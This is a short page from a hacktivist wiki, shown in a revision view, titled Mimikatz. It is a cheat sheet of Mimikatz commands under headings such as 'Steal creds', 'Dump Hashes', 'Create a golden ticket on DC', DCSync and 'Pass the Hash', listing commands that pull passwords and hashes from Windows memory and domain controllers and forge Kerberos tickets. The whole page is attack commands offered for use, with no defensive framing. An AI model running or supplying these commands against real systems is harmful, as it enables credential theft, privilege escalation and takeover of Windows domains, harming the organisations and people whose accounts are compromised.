Mimikatz

From Enlace Hacktivista
Revision as of 22:13, 24 June 2023 by Booda (talk | contribs) (Created page with "=== Steal creds === * privilege::debug * sekurlsa::logonpasswords === Dump Hashes === * token::elevate * lsadump::sam * lsadump::lsa /patch * lsadump::lsa /inject * lsadump::cache * sekurlsa::ekeys === Create a golden ticket on DC === * privilege::debug * lsadump::lsa /inject /name:krbtgt * kerberos::golden /user:administrator /domain:ulaser /sid: /krbtgt: /id: * misc::cmd === Retrieve the password hashes of user accounts from a domain controller === * lsadump::dcsync...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

Steal creds

  • privilege::debug
  • sekurlsa::logonpasswords

Dump Hashes

  • token::elevate
  • lsadump::sam
  • lsadump::lsa /patch
  • lsadump::lsa /inject
  • lsadump::cache
  • sekurlsa::ekeys

Create a golden ticket on DC

  • privilege::debug
  • lsadump::lsa /inject /name:krbtgt
  • kerberos::golden /user:administrator /domain:ulaser /sid: /krbtgt: /id:
  • misc::cmd

Retrieve the password hashes of user accounts from a domain controller

  • lsadump::dcsync /user:

Pass the Hash

  • sekurlsa::pth /user: /domain: /ntlm: /run:cmd
Retrieved from "https://enlacehacktivista.org/index.php?title=Mimikatz&oldid=1055"